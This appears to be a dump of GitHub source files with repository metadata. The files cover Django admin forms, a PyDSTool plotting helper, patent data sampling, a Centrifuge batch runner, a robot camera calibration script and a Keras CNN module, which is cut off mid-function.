blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bb15df5cbfefe03a569174c2cf19f2d2bf85747f
|
6aea24c1d59efd6edd555e9f635d066b96314b43
|
/VotingUsers/admin.py
|
6b2d1e686dcf53fd6e3a6c4065051f9ee80f31e4
|
[] |
no_license
|
HShehu/Django-Voting-App
|
848f167a59dd81d32d6db34a9f8a8cb58d37fac6
|
679e741d4bec54c7d2019ab111059e45fc674964
|
refs/heads/master
| 2023-04-28T09:43:44.707129
| 2020-01-12T12:04:00
| 2020-01-12T12:04:00
| 233,343,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,913
|
py
|
from django import forms
from django.contrib import admin
from django.contrib.auth.models import Group
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from .models import VotingUser
# Register your models here.
class LoginForm(forms.Form):
student_number = forms.CharField(widget=forms.TextInput)
password = forms.CharField(widget=forms.PasswordInput())
class Meta:
model = VotingUser
fields = ('student_number','password',)
class UserCreationForm(forms.ModelForm):
password1 = forms.CharField(label='Password', widget=forms.PasswordInput)
password2 = forms.CharField(
label='Password confirmation', widget=forms.PasswordInput)
class Meta:
model = VotingUser
fields = ('student_number', 'full_name',
'login_code', 'password1', 'password2')
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Passwords don't match")
return password2
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UserChangeForm(forms.ModelForm):
"""A form for updating users. Includes all the fields on
the user, but replaces the password field with admin's
password hash display field.
"""
password = ReadOnlyPasswordHashField()
class Meta:
model = VotingUser
fields = ('student_number', 'password', 'full_name', 'login_code', 'is_staff',
'is_active', 'is_admin')
def clean_password(self):
# Regardless of what the user provides, return the initial value.
# This is done here, rather than on the field, because the
# field does not have access to the initial value
return self.initial["password"]
class VotingUserAdmin(BaseUserAdmin):
form = UserChangeForm
add_form = UserCreationForm
list_display = ('student_number', 'full_name', 'date_joined',
'last_login', 'is_admin', 'is_staff')
search_fields = ('student number', 'full_name', 'is_admin', 'is_staff')
readonly_fields = ('date_joined', 'last_login')
filter_horizontal = ()
list_filter = ()
fieldsets = ()
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('full_name', 'student_number', 'password1', 'password2', 'login_code'),
}),
)
ordering = ('full_name',)
admin.site.register(VotingUser, VotingUserAdmin)
admin.site.unregister(Group)
|
[
"harandemshehu@gmail.com"
] |
harandemshehu@gmail.com
|
ba871c0ac28cf7b9e54bc7b51cf6189e65dda6c3
|
54b70a12932f93216d499666998d80a13fc1fb28
|
/PyDSTool/Toolbox/prep_boxplot.py
|
daf5a9a17df47186b8686547a110a8d8e829e734
|
[
"BSD-2-Clause"
] |
permissive
|
waltherg/pydstool-1
|
8e3954b0b5f8728290fd772536987b16325a1b52
|
e56086b230627e7cbe2099f3cd0734cb6918dc7f
|
refs/heads/master
| 2021-01-15T20:48:15.566752
| 2013-09-27T08:47:02
| 2013-09-27T08:47:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,211
|
py
|
from PyDSTool import remain, loadObjects, array, save_fig, arange, args
from matplotlib.font_manager import FontProperties
from PyDSTool.matplotlib_import import *
from scipy import mean
##symbol_map = {'isomap': {
## 'K': {10: 'k<', 50: 'k>', 100: 'k^', 500: 'kv'},
## 'eps': {20: 'w<', 50: 'w>', 100: 'w^'}
## },
## 'pca': {
## 'knee': {1: 'ws', 2: 'ks'},
## 'var': {80: 'wo', 90: 'ko'}
## }
## }
symbol_map = {'isomap': {
'K': {10: ('ws', 'E'), 50: ('ws', 'F'),
100: ('ws', 'G'), 500: ('ws', 'H')},
'eps': {20: ('ws', 'I'), 50: ('ws', 'J'),
100: ('ws', 'K')}
},
'pca': {
'knee': {1: ('wo', 'A'), 2: ('wo', 'B')},
'var': {80: ('wo', 'C'), 90: ('wo', 'D')}
}
}
# For use with PD-E analysis
def prep_boxplots(data, xlabel_str, figname='', fignum=1, do_legend=1,
means=1, xlegoff=0, ylegstep=1, ylegoff=0, spacing=None):
spacing_actual = {
'width': 0.1,
'wgapfac': 0.75,
'markersize': 12,
'off_fac': 0.7,
'x_step': 0.9, # 9 * width
'x_off': 0,
'box_to_marker': 1.1,
'notch_size': 0.2}
if spacing is not None:
spacing_actual.update(spacing)
width = spacing_actual['width']
wgapfac = spacing_actual['wgapfac']
markersize = spacing_actual['markersize']
off_fac = spacing_actual['off_fac']
x_step = spacing_actual['x_step']
x_off = spacing_actual['x_off']
box_to_marker = spacing_actual['box_to_marker']
notch_size = spacing_actual['notch_size']
n = len(data)
x_min = -width*3.8 #3.75
x_max = (n-1)*x_step+width*4.5 #3.75
if n > 1:
halfticks = arange(1,n)*x_step-x_step/2
figure(fignum)
# work out ordering of data from 'pos' key
order = {}
# `pos` position runs from 1 to n, `ns` runs from 0 to n-1
ns = []
for k, v in data.iteritems():
order[v['pos']] = k
ns.append(v['pos']-1)
ns.sort()
assert ns == range(n)
maxD = 0
max_dimval_markers = 0
labels = []
for pos in range(n):
name = order[pos+1]
pde_name = 'PD_E-'+name
if 'known_dim' in data[name]:
if n == 1:
kdx1 = x_min
kdx2 = x_max
else:
if pos == 0:
kdx1 = x_min
kdx2 = halfticks[0]
elif pos == n-1:
kdx1 = halfticks[n-2]
kdx2 = x_max
else:
kdx1 = halfticks[pos-1]
kdx2 = halfticks[pos]
plot([[kdx1], [kdx2]],
[data[name]['known_dim'],data[name]['known_dim']],
'k', linewidth=1, zorder=0)
slope_data = loadObjects(pde_name)[2]
ds_mins = array(slope_data[:,0])#,shape=(len(slope_data),1))
ds_mins.shape=(len(slope_data),1)
ds_maxs = array(slope_data[:,1])#,shape=(len(slope_data),1))
ds_maxs.shape=(len(slope_data),1)
max_ds = max([max(ds_mins[:,0]),max(ds_maxs[:,0])])
if max_ds > maxD:
maxD = max_ds
# limits args are ineffective here
boxplot(ds_mins,positions=[pos*x_step-width*wgapfac+x_off],whis=100,
means=means,monochrome=True,notch=2,notchsize=notch_size,
limits=(),widths=width,fill=1)
boxplot(ds_maxs,positions=[pos*x_step+width*wgapfac+x_off],whis=100,
means=means,monochrome=True,notch=2,notchsize=notch_size,
limits=(),widths=width,fill=1)
if pos == 0:
fa = figure(fignum).axes[0]
fa.hold(True)
if means:
ds_all_mean = (mean(ds_mins[:,0])+mean(ds_maxs[:,0]))/2
plot([pos*x_step+x_off], [ds_all_mean], 'k^',
markersize=markersize-2)
pca_x = pos*x_step-width*(wgapfac+box_to_marker)+x_off
isomap_x = pos*x_step+width*(wgapfac+box_to_marker)+x_off
pca_ds = {}
isomap_ds = {}
try:
pca_data = data[name]['pca']
except KeyError:
pca_data = []
pca_ds, max_dimval_pca, pca_used = plot_markers(pca_data,
pca_x, 'PCA',
symbol_map['pca'], -1,
width, off_fac, markersize)
if max_dimval_pca > maxD:
maxD = max_dimval_pca
if max_dimval_pca > max_dimval_markers:
max_dimval_markers = max_dimval_pca
try:
isomap_data = data[name]['isomap']
except KeyError:
isomap_data = []
isomap_ds, max_dimval_iso, isomap_used = plot_markers(isomap_data,
isomap_x, 'Isomap',
symbol_map['isomap'], 1,
width, off_fac, markersize)
if max_dimval_iso > maxD:
maxD = max_dimval_iso
if max_dimval_iso > max_dimval_markers:
max_dimval_markers = max_dimval_iso
labels.append(data[name]['label'])
## legend
if do_legend:
font = FontProperties()
font.set_family('sans-serif')
font.set_size(11)
x_legend = x_min + 3*width/4 + xlegoff
y_legend = maxD+ylegoff
# pca legend
for k, s in pca_used:
plot_markers([(k,s,y_legend)], x_legend, 'Legend', symbol_map['pca'],
1, width, off_fac, markersize)
if k == 'var':
legstr = "%s=%d%%"%(k,s)
else:
legstr = "%s=%d"%(k,s)
text(x_legend+3*width/4, y_legend-width*2., legstr,
fontproperties=font)
y_legend -= ylegstep
# isomap legend
isomap_leg_data = []
for k, s in isomap_used:
if y_legend-width*2. <= max_dimval_markers + 2:
y_legend = maxD+ylegoff
x_legend += x_step #-width*.75
plot_markers([(k,s,y_legend)], x_legend, 'Legend', symbol_map['isomap'],
1, width, off_fac, markersize)
## if k == 'eps':
## kstr = '\\epsilon'
## else:
## kstr = k
text(x_legend+3*width/4, y_legend-width*2., "%s=%d"%(k,s),
fontproperties=font)
y_legend -= ylegstep
## tidy up axes, etc.
fa.set_xticks(arange(n)*x_step)
if n>1:
for h in range(n-1):
plot([halfticks[h], halfticks[h]], [0,maxD+1+ylegoff], 'k:')
fa.set_xticklabels(labels)
fa.set_position([0.07, 0.11, 0.9, 0.85])
fa.set_xlim(x_min,x_max)
fa.set_ylim(0,maxD+1+ylegoff)
if xlabel_str != '':
xlabel(r'$\rm{'+xlabel_str+r'}$',args(fontsize=20,fontname='Times'))
ylabel(r'$\rm{Dimension}$',args(fontsize=20,fontname='Times'))
draw()
if figname != '':
save_fig(fignum, figname)
def plot_markers(data, x_base, name, map, xoff_sgn, width, off_fac,
markersize):
maxD = 0
ds = {}
used = []
font = FontProperties()
font.set_family('sans-serif')
font.set_size(10)
for (kind, subkind, dimval) in data:
try:
symb, lab = map[kind][subkind]
except KeyError:
raise KeyError("Invalid key for %s symbols"%name)
used.append((kind, subkind))
try:
ds[dimval] += 1
x_off = xoff_sgn*width*off_fac*(ds[dimval]-1)
except KeyError:
ds[dimval] = 1
x_off = 0
plot([x_base+x_off], [dimval], symb, markersize=markersize)
# hack tweaks
## if lab=='C':
## x_off -= width/15
if lab=='A':
x_off += width/30
text(x_base+x_off-width*.15, dimval-width*2., lab,
fontproperties=font)
if dimval > maxD:
maxD = dimval
return ds, maxD, used
|
[
"rob.clewley@gmail.com"
] |
rob.clewley@gmail.com
|
8df3680c60c5ed0be3507f20ab872a0b2e4420b2
|
a340eb341a38be522a5c4fc359d9345cfb378343
|
/sample/1get_patent_random.py
|
5e0400f1868f45b8fac0e402599b199b5e39ee0b
|
[] |
no_license
|
Catchy1997/DLPAP
|
76fa5758d313be4ddaeacb98b397653a7c4f528b
|
fda4b7d6fee5398140279ba694663670028180c3
|
refs/heads/master
| 2023-01-18T17:35:07.235209
| 2020-12-01T10:37:20
| 2020-12-01T10:37:20
| 262,620,534
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,482
|
py
|
import pandas as pd
import os
from tqdm import tqdm
def csv_dir(filepath, path_list):
for i in tqdm(os.listdir(filepath), ncols=50):
path = os.path.join(filepath, i)
if os.path.isdir(path):
csv_dir(path, path_list)
if path.endswith(".csv"):
path_list.append(path)
return path_list
def sum_patent(year, filepath):
path_list = []
path_list = csv_dir(filepath, path_list)
print(year + " - csv文件数量:" + str(len(path_list)))
patent_file_sum = pd.DataFrame()
for path in path_list:
patent_file = pd.read_csv(path, encoding='utf-8')
patent_file_sum = patent_file_sum.append(patent_file)
print(year + " - 涉及专利数量:" + str(len(patent_file_sum)))
return patent_file_sum
if __name__ == '__main__':
year = "2012"
location_path = "E:/Pythonworkspace/patent/patent_data/Application/" + year + "/"
patent_file_sum = sum_patent(year, location_path)
sample_num_list = [5000, 10000, 20000]
save_path = "E:/Pythonworkspace/patent/process_data/"
for sample_num in sample_num_list:
print("sample number: " + str(sample_num))
result_1 = patent_file_sum[patent_file_sum['result'] == 1]
result_0 = patent_file_sum[patent_file_sum['result'] == 0]
df1 = result_1.sample(int(sample_num)//2)
df0 = result_0.sample(int(sample_num)//2)
df = pd.concat([df1, df0])
filepath = save_path + "sample" + str(sample_num) + "/sample.xlsx"
df.to_excel(filepath)
|
[
"1003677516@qq.com"
] |
1003677516@qq.com
|
37b4ccc5e603b7528bd414ae5bfabf393f41b25f
|
d386ffb0fdd378b6a2478a59866dc9b92ebaac4c
|
/centrifuge.py
|
488456ea39d9c8467af192f4d81b72a4e672756a
|
[] |
no_license
|
theo-allnutt-bioinformatics/scripts
|
7aea8ddb2aee619f866d3bf8a7fde26cc45d317f
|
620ce7dcee65a979d86cae96f8a928cce9426879
|
refs/heads/master
| 2023-04-02T02:15:52.300023
| 2023-03-23T02:17:49
| 2023-03-23T02:17:49
| 135,370,890
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,144
|
py
|
#!/usr/bin/env python
import sys
import re
import glob
import subprocess as sp
import os
digits = re.compile(r'(\d+)')
def tokenize(filename):
return tuple(int(token) if match else token
for token, match in
((fragment, digits.search(fragment))
for fragment in digits.split(filename)))
folder = sys.argv[1]
#folder = os.path.expanduser(folder)
filelist=glob.glob(folder)
filelist.sort(key=tokenize)
outfolder=sys.argv[2]
outsuffix=sys.argv[3]
db=sys.argv[4]
threads=sys.argv[5]
stype=sys.argv[6] #f for fasta q for fastq.. unaligned saved reads are fastq
print filelist
for i in filelist:
print i
outputfile=outfolder+"/"+i.split("/")[-1].split(".")[0]+outsuffix+".cent"
reportfile=outfolder+"/"+i.split("/")[-1].split(".")[0]+outsuffix+".report"
outnomatch=outfolder+"/"+i.split("/")[-1].split(".")[0]+outsuffix+".nohit.fasta"
p1= sp.Popen("/stornext/HPCScratch/home/allnutt.t/bin/centrifuge/centrifuge -x %s -U %s -S %s --report-file %s --un %s --min-hitlen 50 -k 1 -p %s -%s --verbose" %(db,i,outputfile,reportfile,outnomatch,threads,stype), shell=True).wait()
|
[
"noreply@github.com"
] |
theo-allnutt-bioinformatics.noreply@github.com
|
589dc15d83d54624028bcba4ef50d993bef4ab3f
|
ec1591c8185a9debc63a8a4975b2e06a4f5de8a7
|
/tests/test_cli.py
|
9b0e0a63fba6cd3cbc10c3924f88b27fd9bc4c97
|
[
"MIT"
] |
permissive
|
xkumiyu/case-style-changer
|
e605b0dd3c0c23ac3bdc6eafbb1a6b81d680f169
|
26405cf63a4a21572ab634c2a25aab33dc5b616d
|
refs/heads/master
| 2021-06-26T21:06:10.049347
| 2021-01-02T07:22:24
| 2021-01-02T07:22:24
| 229,064,331
| 2
| 0
|
MIT
| 2021-06-01T20:39:30
| 2019-12-19T13:51:15
|
Python
|
UTF-8
|
Python
| false
| false
| 927
|
py
|
import pytest
from case_style_changer.cli import change_case_style
from case_style_changer.cli import parse_args
@pytest.mark.parametrize(
"args, expected",
[
(["camel_case"], {"case_name": "camel_case", "text": None}),
(
["camel_case", "--text", "case style changer"],
{"case_name": "camel_case", "text": "case style changer"},
),
],
)
def test_parser(args, expected):
args = parse_args(args)
assert args.case_name == expected["case_name"]
assert args.text == expected["text"]
@pytest.mark.parametrize(
"text, case_name, expected",
[
("case", "camel", "case"),
("case style changer", "camel_case", "caseStyleChanger"),
("case style\nchanger", "lcc", "caseStyle\nchanger"),
],
)
def test_change_case_style(text, case_name, expected):
result = change_case_style(text, case_name)
assert result == expected
|
[
"xkumiyu@gmail.com"
] |
xkumiyu@gmail.com
|
f1ae19fa704e329df40fcda0e9440f272b59a023
|
1cf679c1fbf24d7eef91d07d3b917ed71f1a3c67
|
/drf13/drf13/asgi.py
|
be7705b0ab54acf66648789d68b75631e7d54cce
|
[] |
no_license
|
manvii3110/Django-Rest-Framework
|
76ef0a0b0886184aec061dc0669440969eca4810
|
69fd8701d1be45bfdec4d585b8579dcfcfe4e3c3
|
refs/heads/master
| 2023-07-17T01:01:47.976108
| 2021-08-28T09:20:32
| 2021-08-28T09:20:32
| 397,284,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 387
|
py
|
"""
ASGI config for drf13 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'drf13.settings')
application = get_asgi_application()
|
[
"msinghal3102@gmail.com"
] |
msinghal3102@gmail.com
|
11512be1019c8d77e6c0541c852f00fd86caa371
|
8739a104f09f17890680fec70f242c2c4f41da86
|
/scripts/Calibration/RealsenseF200/make_handCamCalibData_ir.py
|
96d0c55aa072c355d37e81cd6217ee4e6e114c2f
|
[] |
no_license
|
W567/Plates_stacking
|
dfa71d0cd104e1b80056ef0ce7207ace73e9f211
|
0c5b433b1963726520d00feec153b9164e73e2a5
|
refs/heads/master
| 2021-02-27T05:25:19.915102
| 2020-03-07T06:54:14
| 2020-03-07T06:54:14
| 245,583,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,540
|
py
|
import sys
import os
import time
import copy
import threading
import numpy as np
import json
import cv2
import xml.etree.ElementTree as xmlEt
from math import pi
# import world path ===================
import WorkspaceDirInfo as shareDir
sys.path.append(shareDir.WorkspaceDir)
import share.tools.geo.geo as geo
# import local path ===================
sys.path.append(os.path.join(".."))
import set_env
baseDir = shareDir.WorkspaceDir + set_env.MyName
sys.path.append(baseDir)
import myPyUtil as myUtil
### define Chessboard information ###
CHESS_SIZE = (13 - 1, 9 - 1)
#CHESS_SIZE = (12 - 1, 7 - 1)
CHESS_SQUARE_SIZE = 25 # [mm]
### path of camera parameter #####################
PATH_CAM_PARAM = shareDir.WorkspaceDir + "share/data/RealSense/RealSense-02/intrinsic_IR.xml"
PATH_IMAGE_DATA = baseDir + "/data/handCamCalib_ir/"
TITLE = "picture"
EXTENSION = ".png"
JSON_DATA_NAME = "handCamCalibData_ir.json"
### Transform HAND to CAMERA as initial value ##################
Th2c_handCam_xyzabc = [
- 0.090, # [m]
0.000, # [m]
0.135, # 0.033, #[m]
0.00 * pi, # rotation around x axis [rad]
0.00 * pi, # rotation around y axis [rad]
- 0.50 * pi # rotation around z axis [rad]
]
Th2c_handCam = geo.FRAME(xyzabc=Th2c_handCam_xyzabc)
### Tranform HAND to TOOL TIP for calib mortion ###
Th2tool_handCamCalib_xyzabc = [
-0.084, # -0.084,
-0.02, # -0.02,
0.45, # 0.45,
0.00 * pi,
0.99999999 * pi,
0.00 * pi]
# Th2tool_handCamCalib_xyzabc = [
# -0.086,
# 0.00,
# 0.50,
# 0.00 * pi,
# 0.99999999 * pi,
# 0.00 * pi]
# Th2tool_handCamCalib_xyzabc = [
# 0.00,
# 0.00,
# 0.227,
# 0.00 * pi,
# 0.99999999 * pi,
# 0.00 * pi])
Th2tool_handCamCalib = geo.FRAME(xyzabc=Th2tool_handCamCalib_xyzabc)
### motion conf center of watch ################################################
# x = 0.70
# y = 0.06# -0.16
# z = 0.01
x = 0.837
y = -0.293# -0.16
z = 0.01
# x = 0.70
# y = 0.065# -0.16
# z = 0.03
Pos_B = []
Pos_B.append([x, y, z, 0, 0, 0])
Pos_B.append([x, y, z, 0.05 * pi, -0.1 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.00 * pi, -0.1 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.1 * pi, -0.1 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.2 * pi, -0.1 * pi, 0 * pi])
Pos_B.append([x, y, z, 0.05 * pi, -0.0 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.00 * pi, -0.0 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.1 * pi, -0.0 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.2 * pi, -0.0 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.00 * pi, 0.05 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.1 * pi, 0.05 * pi, 0 * pi])
Pos_B.append([x, y, z, -0.2 * pi, 0.05 * pi, 0 * pi])
#####
Pos_B.append([x, y, z, 0.05 * pi, -0.1 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.00 * pi, -0.1 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.1 * pi, -0.1 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.2 * pi, -0.1 * pi, 0.25 * pi])
Pos_B.append([x, y, z, 0.05 * pi, -0.0 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.00 * pi, -0.0 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.1 * pi, -0.0 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.2 * pi, -0.0 * pi, 0.25 * pi])
#Pos_B.append([x, y, z, -0.00 * pi, 0.05 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.1 * pi, 0.05 * pi, 0.25 * pi])
Pos_B.append([x, y, z, -0.2 * pi, 0.05 * pi, 0.25 * pi])
#Pos_B.append([x, y, z, 0.15 * pi, 0.05 * pi, -0.4 * pi])
#Pos_B.append([x, y, z, 0.095 * pi, 0.025 * pi, 0.2 * pi])
#Pos_B.append([x, y, z, -0.00 * pi, 0.05 * pi, -0.2 * pi])
Pos_B.append([x, y, z, -0.075 * pi, -0.1 * pi, 0.1 * pi])
Pos_B.append([x, y, z, -0.15 * pi, -0.05 * pi, -0.3 * pi])
#Pos_B.append([x, y, z, 0.15 * pi, -0.1 * pi, -0.4 * pi])
#Pos_B.append([x, y, z, 0.075 * pi, -0.05 * pi, -0.2 * pi])
Pos_B.append([x, y, z, -0.00 * pi, -0.1 * pi, 0.1 * pi])
Pos_B.append([x, y, z, -0.075 * pi, 0.05 * pi, -0.1 * pi])
#Pos_B.append([x, y, z, -0.15 * pi, 0.1 * pi, 0.1 * pi])
#=========================================================================
plist_handCamCalib = []
plist_handCamCalib.append([x, y, z, 0.20 * pi, 0, 0.4 * pi])
plist_handCamCalib.append([x, y, z, 0.1 * pi, 0, -0.35 * pi])
plist_handCamCalib.append([x, y, z, -0.00 * pi, -0.05, 0.2 * pi])
plist_handCamCalib.append([x, y, z, -0.1 * pi, 0, -0.4 * pi])
plist_handCamCalib.append([x, y, z, -0.2 * pi, 0, 0.3 * pi])
plist_handCamCalib.append([x, y, z, 0.15 * pi, 0.05 * pi, -0.4 * pi])
plist_handCamCalib.append([x, y, z, 0.095 * pi, 0.025 * pi, 0.2 * pi])
plist_handCamCalib.append([x, y, z, -0.00 * pi, 0.05 * pi, -0.2 * pi])
plist_handCamCalib.append([x, y, z, -0.075 * pi, -0.1 * pi, 0.1 * pi])
plist_handCamCalib.append([x, y, z, -0.15 * pi, -0.05 * pi, -0.3 * pi])
plist_handCamCalib.append([x, y, z, 0.15 * pi, -0.1 * pi, -0.4 * pi])
plist_handCamCalib.append([x, y, z, 0.075 * pi, -0.05 * pi, -0.2 * pi])
plist_handCamCalib.append([x, y, z, -0.00 * pi, -0.1 * pi, 0.1 * pi])
plist_handCamCalib.append([x, y, z, -0.075 * pi, 0.05 * pi, -0.1 * pi])
plist_handCamCalib.append([x, y, z, -0.15 * pi, 0.1 * pi, 0.1 * pi])
def json_read(filePath):
f = open(filePath, "r")
json_data = json.load(f)
f.close()
return json_data
def json_write(dict, filePath):
f = open(filePath, "w")
json.dump(dict, f, indent=4)
f.close()
def move_calib():
from share.tools.classes.f21pa10Class import fpa10Class
from tools.classes.realsenseClass import realsenseClass
camera = realsenseClass()
arm = fpa10Class("_l")
arm.Th2tool = Th2tool_handCamCalib
arm.otc_setToolOffset([arm.Th2tool.vec[0], arm.Th2tool.vec[1], arm.Th2tool.vec[2]])
arm.mode_joint()
arm.move_joint(arm.j_ready)
arm.mode_rmrc()
time.sleep(1)
plistData = []
for i in range(len(Pos_B)):
# raw_input("press Enter to move next point >>")
arm.move_rmrc(Pos_B[i])
title = TITLE + str(i) + EXTENSION;
# time.sleep(1)
# camera.update_image(camera.IR)
time.sleep(3)
camera.save_irImage(PATH_IMAGE_DATA + title)
plistData.append(arm.t_xyzabc_now)
raw_input("finished. press Enter to back to ready position")
arm.mode_joint()
arm.move_joint(arm.j_ready)
data = {"plistData": plistData}
json_write(data, PATH_IMAGE_DATA + "plistData.json")
def calc_extrinsic(tuple_chessSize, chessSquareSize, list_img, camParam, distortion):
# cvWindow = cv2.namedWindow( "cv_window" )
# create object points
objPoints = []
for i in range(0, tuple_chessSize[1]):
for j in range(0, tuple_chessSize[0]):
objPoints.append((i * chessSquareSize, j * chessSquareSize, 0))
objPoints = np.array(objPoints)
list_Tf = []
list_accept = []
counter = 0
# process each images
for img in list_img:
print "img : %d" % counter
# cvt img BGR to GRAY
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# find chesscoard corners
found, corners = cv2.findChessboardCorners(gray, tuple_chessSize)
if found:
# find corner sub pix
cv2.cornerSubPix(
image=gray,
corners=corners,
winSize=(5, 5),
zeroZone=(-1, -1),
criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 30, 0.01))
# calc extrinsic
print ' distortion'
objPoints = objPoints.astype(np.float64)
found, r_vec, t_vec = cv2.solvePnP(
objectPoints=objPoints,
imagePoints=corners,
cameraMatrix=camParam,
distCoeffs=distortion)
r_mtx, scratch = cv2.Rodrigues(r_vec)
Tf = np.matrix([
[r_mtx[0, 0], r_mtx[0, 1], r_mtx[0, 2], t_vec[0, 0] * 0.001],
[r_mtx[1, 0], r_mtx[1, 1], r_mtx[1, 2], t_vec[1, 0] * 0.001],
[r_mtx[2, 0], r_mtx[2, 1], r_mtx[2, 2], t_vec[2, 0] * 0.001],
[0., 0., 0., 1.], # t_vec is converted [mm]->[m]
])
list_Tf.append(Tf.tolist())
list_accept.append(True)
print "Transform"
print Tf
else:
list_Tf.append(None)
list_accept.append(False)
print "FAILED to fined corner"
print ""
cv2.drawChessboardCorners(img, tuple_chessSize, corners, found)
# cv2.imshow( "cv_window", img )
# cv2.waitKey()
# raw_input()#----------------------------------------------------------
counter += 1
# cv2.destroyWindow("cv_window")
return list_Tf, list_accept
def make_jsonData():
# make plist_handCamCalibData
plistData = json_read(PATH_IMAGE_DATA + "plistData.json")
plist_handCamCalibData = plistData["plistData"]
print plist_handCamCalibData
# make list image
list_img = []
list_inputFileName = []
for i in range(len(plist_handCamCalibData)):
title = PATH_IMAGE_DATA + TITLE + str(i) + EXTENSION
list_inputFileName.append(title)
list_img.append(cv2.imread(title))
# ## load Intrinsic
handCam_intrinsic = xmlEt.parse(PATH_CAM_PARAM).getroot()
camParam = myUtil.cvXml2cvNdarray(handCam_intrinsic.find("camera_matrix"))
distortion = myUtil.cvXml2cvNdarray(handCam_intrinsic.find("distortion_coefficients"))
print 'intrinsic'
print handCam_intrinsic
print ' camParam'
print camParam
print ' distortion'
print distortion
# ## calc extrinsics
list_Tf, isAccepted = calc_extrinsic(
CHESS_SIZE,
CHESS_SQUARE_SIZE,
list_img,
camParam,
distortion)
print "%d images are accepted." % np.sum(isAccepted)
print "list_Tf : ", list_Tf
plist_handCamCalib = []
listTf_Tc2cb = []
for i, ret in enumerate(isAccepted):
if (ret == True):
plist_handCamCalib.append(plist_handCamCalibData[i])
listTf_Tc2cb.append(list_Tf[i])
jdata = {"plist_handCamCalib": plist_handCamCalib, \
"listTf_Tc2cb": listTf_Tc2cb, \
"Th2tool_handCamCalib_xyzabc": Th2tool_handCamCalib_xyzabc, \
"Th2c_handCam_xyzabc": Th2c_handCam_xyzabc
}
json_write(jdata, JSON_DATA_NAME)
if __name__ == "__main__":
# move_calib()
make_jsonData()
|
[
"wlqwa567@hotmail.com"
] |
wlqwa567@hotmail.com
|
5ea5170baa6fdec14d8316f4133420a9339ddcc1
|
12e1fcbeb0bb0c3866e9aa863016ebf5b8cf6fa9
|
/keras/network.py
|
908281f9a7e71e3d9586f0d15d278bc7f28cf585
|
[] |
no_license
|
Grid-Gudx/sound_classification
|
0eee6c523e5c6732ce4456a297757ef20015753c
|
c79a83b5882c1b386254a33b2ac9ac44d0546f7b
|
refs/heads/main
| 2023-08-18T14:51:33.181996
| 2021-09-15T07:54:53
| 2021-09-15T07:54:53
| 403,004,685
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,423
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 4 16:30:42 2021
@author: gdx
"""
from tensorflow.keras.layers import *
import tensorflow.keras.backend as K
from tensorflow.keras import Model
from attention_module import cbam_block
def cnn_block(x, filters, kernel_size):
x = Conv2D(filters, kernel_size, padding='same', activation='relu')(x)
x = Conv2D(filters, kernel_size, padding='same')(x)
x = Activation('relu')(x)
# x = BatchNormalization(axis=-1,trainable=False)(x) #对每个通道进行归一化
x = MaxPooling2D((2,2))(x)
return x
def res_block(x, filters, kernel_size):
skip = Conv1D(filters, 1, padding='same')(x)
x = Conv1D(filters, kernel_size, padding='same', activation='relu')(x)
x = Conv1D(filters, kernel_size, padding='same')(x)
x = add([skip, x])
x = Activation('relu')(x)
# x = BatchNormalization(axis=-1,trainable=False)(x) #对每个通道进行归一化
x = MaxPooling1D(2)(x)
return x
def cnn(x, output_dim=8):
x = cnn_block(x, 8, (3,3))
x = cnn_block(x, 16, (3,3))
x = cnn_block(x, 32, (3,3))
x = cnn_block(x, 64, (3,3)) #out batch * width * height * channal
# x = cbam_block(x, ratio=8)
